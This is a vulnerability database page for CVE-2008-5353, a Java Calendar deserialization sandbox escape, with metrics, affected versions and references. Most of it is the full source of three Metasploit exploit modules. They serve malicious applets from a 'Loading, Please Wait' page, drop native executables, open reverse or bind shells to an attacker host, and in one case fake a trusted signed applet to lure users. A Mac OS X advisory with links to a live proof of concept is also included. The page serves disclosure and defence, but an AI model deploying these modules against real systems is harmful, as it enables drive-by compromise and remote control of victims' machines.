CVE-2008-5353 : Detail

CVE-2008-5353

97.04%V3
Network
2008-12-05
10h00 +00:00
2018-10-11
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier does not properly enforce context of ZoneInfo objects during deserialization, which allows remote attackers to run untrusted applets and applications in a privileged context, as demonstrated by "deserializing Calendar objects".

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 16302

Publication date : 2011-01-07 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: java_signed_applet.rb 11516 2011-01-08 01:13:26Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Java include Msf::Exploit::EXE def initialize( info = {} ) super( update_info( info, 'Name' => 'Signed Applet Social Engineering Code Exec', 'Description' => %q{ This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it to a .jar file, then signs the .jar with a dynamically created certificate containing values of your choosing. This is presented to the end user via a web page with an applet tag, loading the signed applet. The user's JVM pops a dialog asking if they trust the signed applet and displays the values chosen. Once the user clicks 'accept', the applet executes with full user permissions. The java payload used in this exploit is derived from Stephen Fewer's and HDM's payload created for the CVE-2008-5353 java deserialization exploit. This module requires the rjb rubygem, the JDK, and the $JAVA_HOME variable to be set. If these dependencies are not present, the exploit falls back to a static, signed JAR. }, 'License' => MSF_LICENSE, 'Author' => [ 'natron' ], 'Version' => '$Revision: 11516 $', 'References' => [ [ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ] ], 'DefaultTarget' => 1 )) register_options( [ OptString.new( 'CERTCN', [ true, "The CN= value for the certificate.", "Metasploit Inc." ]), OptString.new( 'APPLETNAME', [ true, "The main applet's class name.", "SiteLoader" ]), #OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]), # Not implemented yet. #OptString.new('PACKAGENAME', [ true, "The package name for gen'd classes.","x" ]), # Needs Rex::Zip to be able to crack zip files #OptString.new('CUSTOMJAR', [ false, "A custom .jar applet to use.", nil]), ], self.class) # No source right now, so don't give an option to save it #register_advanced_options( # [ # OptString.new('SaveToFile', [ false, "When set, source is saved to this directory under external/source/", nil ]) # ], self.class) end def exploit # # Currently doing all processing in on_request_uri. # If this is too slow, we can move applet generation up here. # @use_static = false if not @jvm_init print_error print_error "The JDK failed to initialized: #{@java_error}" print_error "In order to dynamically sign the applet, you must install the Java Development Kit, the rjb gem, and set the JAVA_HOME environment variable." print_error print_error "Falling back to static signed applet. This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored." print_error @use_static = true else cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java") compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ]) applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class") @compiled_applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) } end super end def on_request_uri( cli, request ) payload = regenerate_payload(cli) if not payload print_error( "Failed to generate the payload." ) # Send them a 404 so the browser doesn't hang waiting for data # that will never come. send_not_found(cli) return end if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." ) send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) return end # If we haven't returned yet, then this is a request for our applet # jar, build one for this victim. jar = payload.encoded_jar if @use_static # Then build from the statically signed class files. Note that # this uses a pre-compiled version of Payload.class, so any new # updates to that file in the normal javapayload will not be # reflected here! applet_file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", "SiteLoader.class") applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) } jar.add_file("SiteLoader.class", applet_data) print_status("Building statically signed jar for #{cli.peerhost}") build_static_sig(jar) data = jar.to_s else # Then build from the class file we compiled in the exploit() # method above. jar.add_file("#{datastore["APPLETNAME"]}.class", @compiled_applet_data) print_status("Signing file for #{cli.peerhost}") # The RJB signing class requires the jar to be an actual file on # the filesystem, write it out. File.open(File.join(datastore["JavaCache"], "tmp.jar"), 'wb') { |f| f.write(jar.to_s) } sign_jar(datastore["CERTCN"], "tmp.jar", "signed.jar") # ... and read in the resulting signed jar data = File.open(File.join(datastore["JavaCache"], "signed.jar"), "rb") { |f| f.read(f.stat.size) } end print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." ) send_response( cli, data.to_s, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html html = %Q|<html><head><title>Loading, Please Wait...</title></head> | html += %Q|<body><center><p>Loading, Please Wait...</p></center> | html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar"\n| if @use_static html += %Q| code="SiteLoader" width="1" height="1">\n| else html += %Q| code="#{datastore["APPLETNAME"]}" width="1" height="1">\n| end html += %Q|</applet></body></html>| return html end def build_static_sig(jar) files = [ "metasploit/Payload.class", "SiteLoader.class", "META-INF/MANIFEST.MF", "META-INF/SIGNFILE.RSA", "META-INF/SIGNFILE.SF", ] # Ghetto. Replace existing files in the Jar, then add in # anything that wasn't replaced. The reason for replacing the # .class files is to ensure that we're sending the # Payload.class as was signed rather than a newer one that was # updated without updating the signature. We'll just have to # cross our fingers and hope that any updates don't break # backwards compatibility in the handler until we can get # signing to work from ruby. Once we can sign jars directly # from ruby using OpenSSL, this won't be a problem. replaced = [] # Replace the ones that are already there. jar.entries.map do |e| file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e.name) if File.file? file File.open(file, "rb") do |f| e.data = f.read(f.stat.size) end end replaced << e.name end # Add the rest files.each { |e| next if replaced.include? e file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e) File.open(file, "rb") do |f| jar.add_file(e, f.read(f.stat.size)) end } jar end def applet_code applet = <<-EOS import java.applet.*; import metasploit.*; public class #{datastore["APPLETNAME"]} extends Applet { public void init() { try { Payload.main(null); } catch (Exception ex) { //ex.printStackTrace(); } } } EOS end end
Exploit Database EDB-ID : 16293

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: java_calendar_deserialize.rb 10389 2010-09-20 04:38:13Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Sun Java Calendar Deserialization Exploit', 'Description' => %q{ This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected). }, 'License' => MSF_LICENSE, 'Author' => [ 'sf', 'hdm' ], 'Version' => '$Revision: 10389 $', 'References' => [ [ 'CVE', '2008-5353' ], [ 'OSVDB', '50500'], [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ], [ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ], [ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ], [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ] ], 'Platform' => [ 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 03 2008' )) end def exploit # load the static jar file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" ) fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close super end def on_request_uri( cli, request ) data = nil host = nil port = nil if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." ) payload = regenerate_payload( cli ) if not payload print_error( "Failed to generate the payload." ) return end if target.name == 'Generic (Java Payload)' if datastore['LHOST'] jar = payload.encoded host = datastore['LHOST'] port = datastore['LPORT'] print_status( "Payload will be a Java reverse shell to #{host}:#{port} from #{cli.peerhost}..." ) else port = datastore['LPORT'] datastore['RHOST'] = cli.peerhost print_status( "Payload will be a Java bind shell on #{cli.peerhost}:#{port}..." ) end if jar print_status( "Generated jar to drop (#{jar.length} bytes)." ) jar = Rex::Text.to_hex( jar, prefix="" ) else print_error( "Failed to generate the executable." ) return end else # NOTE: The EXE mixin automagically handles detection of arch/platform data = generate_payload_exe if data print_status( "Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) else print_error( "Failed to generate the executable." ) return end end send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) return end print_status( "#{self.name} sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." ) send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html( data, jar, host, port ) html = "<html><head><title>Loading, Please Wait...</title></head>" html += "<body><center><p>Loading, Please Wait...</p></center>" html += "<applet archive=\"Applet.jar\" code=\"msf.x.AppletX.class\" width=\"1\" height=\"1\">" html += "<param name=\"data\" value=\"#{data}\"/>" if data html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar html += "<param name=\"lhost\" value=\"#{host}\"/>" if host html += "<param name=\"lport\" value=\"#{port}\"/>" if port html += "</applet></body></html>" return html end def generate_jar() return @jar_data end end
Exploit Database EDB-ID : 9948

Publication date : 2008-12-02 23h00 +00:00
Author : sf
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML def initialize( info = {} ) super( update_info( info, 'Name' => 'Sun Java Calendar Deserialization Exploit', 'Description' => %q{ This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The effected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected). }, 'License' => MSF_LICENSE, 'Author' => [ 'sf', 'hdm' ], 'Version' => '1', 'References' => [ [ 'CVE', '2008-5353' ], [ 'OSVDB', '50500'], [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ], [ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ], [ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ], [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ] ], 'Platform' => [ 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { # This is a bad hack to force only the generic/shell_bind_tcp and generic/shell_reverse_tcp payloads 'Platform' => ['win'], 'Payload' => { 'Space' => 0 }, 'Arch' => ARCH_CMD, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0 )) end def on_request_uri( cli, request ) data = nil host = nil port = nil if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." ) payload = regenerate_payload( cli ) if not payload print_status( "Failed to generate the payload." ) return end if target.name == 'Generic (Java Payload)' if datastore['LHOST'] host = datastore['LHOST'] port = datastore['LPORT'] print_status( "Payload will be a Java reverse shell to #{host}:#{port} from #{cli.peerhost}..." ) else port = datastore['LPORT'] datastore['RHOST'] = cli.peerhost print_status( "Payload will be a Java bind shell on #{cli.peerhost}:#{port}..." ) end else if target['Arch'] == ARCH_X86 data = Msf::Util::EXE.to_win32pe( framework, payload.encoded ) if target['Platform'] == 'win' data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx' data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux' elsif target['Arch'] == ARCH_PPC data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx' end if data print_status( "Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) else print_status( "Failed to generate the executable." ) return end end send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) return end print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." ) send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html( data, host, port ) html = "<html><head><title>Loading, Please Wait...</title></head>" html += "<body><center><p>Loading, Please Wait...</p></center>" html += "<applet archive=\"Applet.jar\" code=\"msf.x.AppletX.class\" width=\"1\" height=\"1\">" html += "<param name=\"data\" value=\"#{data}\"/>" if data html += "<param name=\"lhost\" value=\"#{host}\"/>" if host html += "<param name=\"lport\" value=\"#{port}\"/>" if port html += "</applet></body></html>" return html end def generate_jar() path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" ) fd = File.open( path, "rb" ) data = fd.read(fd.stat.size) fd.close return data end end
Exploit Database EDB-ID : 8753

Publication date : 2009-05-19 22h00 +00:00
Author : Landon Fuller
EDB Verified : Yes

Critical Mac OS X Java Vulnerabilities Introduction Five months ago, CVE-2008-5353 and other vulnerabilities were publicly disclosed, and fixed by Sun. CVE-2008-5353 allows malicious code to escape the Java sandbox and run arbitrary commands with the permissions of the executing user. This may result in untrusted Java applets executing arbitrary code merely by visiting a web page hosting the applet. The issue is trivially exploitable. Unfortunately, these vulnerabilities remain in Apple's shipping JVMs, as well as Soylatte 1.0.3. As Soylatte does not provide browser plugins, the impact of the vulnerability is reduced. The recent release of OpenJDK6/Mac OS X is not affected by CVE-2008-5353. Work-Arounds * Mac OS X users should disable Java applets in their browsers and disable 'Open "safe" files after downloading' in Safari. * Soylatte users running untrusted code should upgrade to an OpenJDK6-based release, where possible. No future releases of the JRL-based Soylatte branch are planned at this time. If this is an issue for you, please feel free to contact me. * No work-around is available for users otherwise running Java untrusted code. Proof of Concept Unfortunately, it seems that many Mac OS X security issues are ignored if the severity of the issue is not adequately demonstrated. Due to the fact that an exploit for this issue is available in the wild, and the vulnerability has been public knowledge for six months, I have decided to release a my own proof of concept to demonstrate the issue. If you visit the following page, "/usr/bin/say" will be executed on your system by a Java applet, with your current user permissions. This link will execute code on your system with your current user permissions. The proof of concept runs on fully-patched PowerPC and Intel Mac OS X systems. http://landonf.bikemonkey.org/static/moab-tests/CVE-2008-5353/hello.html compiled/decompiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8753.tgz (2009-javax.tgz) # milw0rm.com [2009-05-20]

Products Mentioned

Configuraton 0

Sun>>Jdk >> Version To (including) 5.0

Sun>>Jdk >> Version To (including) 6

Sun>>Jdk >> Version 5.0

    Sun>>Jdk >> Version 5.0

      Sun>>Jdk >> Version 5.0

        Sun>>Jdk >> Version 5.0

          Sun>>Jdk >> Version 5.0

            Sun>>Jdk >> Version 5.0

              Sun>>Jdk >> Version 5.0

                Sun>>Jdk >> Version 5.0

                  Sun>>Jdk >> Version 5.0

                    Sun>>Jdk >> Version 5.0

                      Sun>>Jdk >> Version 5.0

                        Sun>>Jdk >> Version 5.0

                          Sun>>Jdk >> Version 5.0

                            Sun>>Jdk >> Version 5.0

                              Sun>>Jdk >> Version 5.0

                                Sun>>Jdk >> Version 6

                                  Sun>>Jdk >> Version 6

                                    Sun>>Jdk >> Version 6

                                      Sun>>Jdk >> Version 6

                                        Sun>>Jdk >> Version 6

                                          Sun>>Jdk >> Version 6

                                            Sun>>Jdk >> Version 6

                                              Sun>>Jdk >> Version 6

                                                Sun>>Jdk >> Version 6

                                                  Sun>>Jdk >> Version 6

                                                    Sun>>Jre >> Version To (including) 1.4.2_18

                                                    Sun>>Jre >> Version To (including) 5.0

                                                    Sun>>Jre >> Version To (including) 6

                                                    Sun>>Jre >> Version 1.4.2_1

                                                    Sun>>Jre >> Version 1.4.2_2

                                                    Sun>>Jre >> Version 1.4.2_3

                                                    Sun>>Jre >> Version 1.4.2_4

                                                    Sun>>Jre >> Version 1.4.2_5

                                                    Sun>>Jre >> Version 1.4.2_6

                                                    Sun>>Jre >> Version 1.4.2_7

                                                    Sun>>Jre >> Version 1.4.2_8

                                                    Sun>>Jre >> Version 1.4.2_9

                                                    Sun>>Jre >> Version 1.4.2_10

                                                    Sun>>Jre >> Version 1.4.2_11

                                                    Sun>>Jre >> Version 1.4.2_12

                                                    Sun>>Jre >> Version 1.4.2_13

                                                    Sun>>Jre >> Version 1.4.2_14

                                                    Sun>>Jre >> Version 1.4.2_15

                                                    Sun>>Jre >> Version 1.4.2_16

                                                    Sun>>Jre >> Version 1.4.2_17

                                                    Sun>>Jre >> Version 5.0

                                                    Sun>>Jre >> Version 5.0

                                                      Sun>>Jre >> Version 5.0

                                                        Sun>>Jre >> Version 5.0

                                                          Sun>>Jre >> Version 5.0

                                                            Sun>>Jre >> Version 5.0

                                                              Sun>>Jre >> Version 5.0

                                                                Sun>>Jre >> Version 5.0

                                                                  Sun>>Jre >> Version 5.0

                                                                    Sun>>Jre >> Version 5.0

                                                                      Sun>>Jre >> Version 5.0

                                                                        Sun>>Jre >> Version 5.0

                                                                          Sun>>Jre >> Version 5.0

                                                                            Sun>>Jre >> Version 5.0

                                                                              Sun>>Jre >> Version 5.0

                                                                                Sun>>Jre >> Version 5.0

                                                                                  Sun>>Jre >> Version 6

                                                                                    Sun>>Jre >> Version 6

                                                                                      Sun>>Jre >> Version 6

                                                                                        Sun>>Jre >> Version 6

                                                                                          Sun>>Jre >> Version 6

                                                                                            Sun>>Jre >> Version 6

                                                                                              Sun>>Jre >> Version 6

                                                                                                Sun>>Jre >> Version 6

                                                                                                  Sun>>Jre >> Version 6

                                                                                                    Sun>>Jre >> Version 6

                                                                                                      Sun>>Sdk >> Version To (including) 1.4.2_18

                                                                                                      Sun>>Sdk >> Version 1.4.2_1

                                                                                                      Sun>>Sdk >> Version 1.4.2_2

                                                                                                      Sun>>Sdk >> Version 1.4.2_3

                                                                                                      Sun>>Sdk >> Version 1.4.2_4

                                                                                                      Sun>>Sdk >> Version 1.4.2_5

                                                                                                      Sun>>Sdk >> Version 1.4.2_6

                                                                                                      Sun>>Sdk >> Version 1.4.2_7

                                                                                                      Sun>>Sdk >> Version 1.4.2_8

                                                                                                      Sun>>Sdk >> Version 1.4.2_9

                                                                                                      Sun>>Sdk >> Version 1.4.2_10

                                                                                                      Sun>>Sdk >> Version 1.4.2_11

                                                                                                      Sun>>Sdk >> Version 1.4.2_12

                                                                                                      Sun>>Sdk >> Version 1.4.2_13

                                                                                                      Sun>>Sdk >> Version 1.4.2_14

                                                                                                      Sun>>Sdk >> Version 1.4.2_15

                                                                                                      Sun>>Sdk >> Version 1.4.2_16

                                                                                                      Sun>>Sdk >> Version 1.4.2_17

                                                                                                      References

                                                                                                      http://marc.info/?l=bugtraq&m=126583436323697&w=2
                                                                                                      Tags : vendor-advisory, x_refsource_HP
                                                                                                      http://secunia.com/advisories/34259
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://www.vupen.com/english/advisories/2009/0672
                                                                                                      Tags : vdb-entry, x_refsource_VUPEN
                                                                                                      http://rhn.redhat.com/errata/RHSA-2008-1018.html
                                                                                                      Tags : vendor-advisory, x_refsource_REDHAT
                                                                                                      http://secunia.com/advisories/33015
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://secunia.com/advisories/34889
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://secunia.com/advisories/34233
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://www.securitytracker.com/id?1021313
                                                                                                      Tags : vdb-entry, x_refsource_SECTRACK
                                                                                                      http://security.gentoo.org/glsa/glsa-200911-02.xml
                                                                                                      Tags : vendor-advisory, x_refsource_GENTOO
                                                                                                      http://marc.info/?l=bugtraq&m=123678756409861&w=2
                                                                                                      Tags : vendor-advisory, x_refsource_HP
                                                                                                      http://secunia.com/advisories/38539
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://secunia.com/advisories/34972
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      https://rhn.redhat.com/errata/RHSA-2009-0466.html
                                                                                                      Tags : vendor-advisory, x_refsource_REDHAT
                                                                                                      http://secunia.com/advisories/35065
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://secunia.com/advisories/33528
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://rhn.redhat.com/errata/RHSA-2008-1025.html
                                                                                                      Tags : vendor-advisory, x_refsource_REDHAT
                                                                                                      http://marc.info/?l=bugtraq&m=126583436323697&w=2
                                                                                                      Tags : vendor-advisory, x_refsource_HP
                                                                                                      http://www.vupen.com/english/advisories/2008/3339
                                                                                                      Tags : vdb-entry, x_refsource_VUPEN
                                                                                                      http://marc.info/?l=bugtraq&m=123678756409861&w=2
                                                                                                      Tags : vendor-advisory, x_refsource_HP
                                                                                                      http://www.redhat.com/support/errata/RHSA-2009-0445.html
                                                                                                      Tags : vendor-advisory, x_refsource_REDHAT
                                                                                                      http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1
                                                                                                      Tags : vendor-advisory, x_refsource_SUNALERT
                                                                                                      http://www.redhat.com/support/errata/RHSA-2009-0016.html
                                                                                                      Tags : vendor-advisory, x_refsource_REDHAT
                                                                                                      http://www.us-cert.gov/cas/techalerts/TA08-340A.html
                                                                                                      Tags : third-party-advisory, x_refsource_CERT
                                                                                                      http://secunia.com/advisories/33709
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://secunia.com/advisories/34605
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://www.redhat.com/support/errata/RHSA-2009-0015.html
                                                                                                      Tags : vendor-advisory, x_refsource_REDHAT
                                                                                                      http://secunia.com/advisories/35118
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://www.vupen.com/english/advisories/2009/1391
                                                                                                      Tags : vdb-entry, x_refsource_VUPEN
                                                                                                      http://secunia.com/advisories/32991
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://osvdb.org/50500
                                                                                                      Tags : vdb-entry, x_refsource_OSVDB
                                                                                                      http://www.securityfocus.com/bid/32608
                                                                                                      Tags : vdb-entry, x_refsource_BID
                                                                                                      http://secunia.com/advisories/37386
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://secunia.com/advisories/33710
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA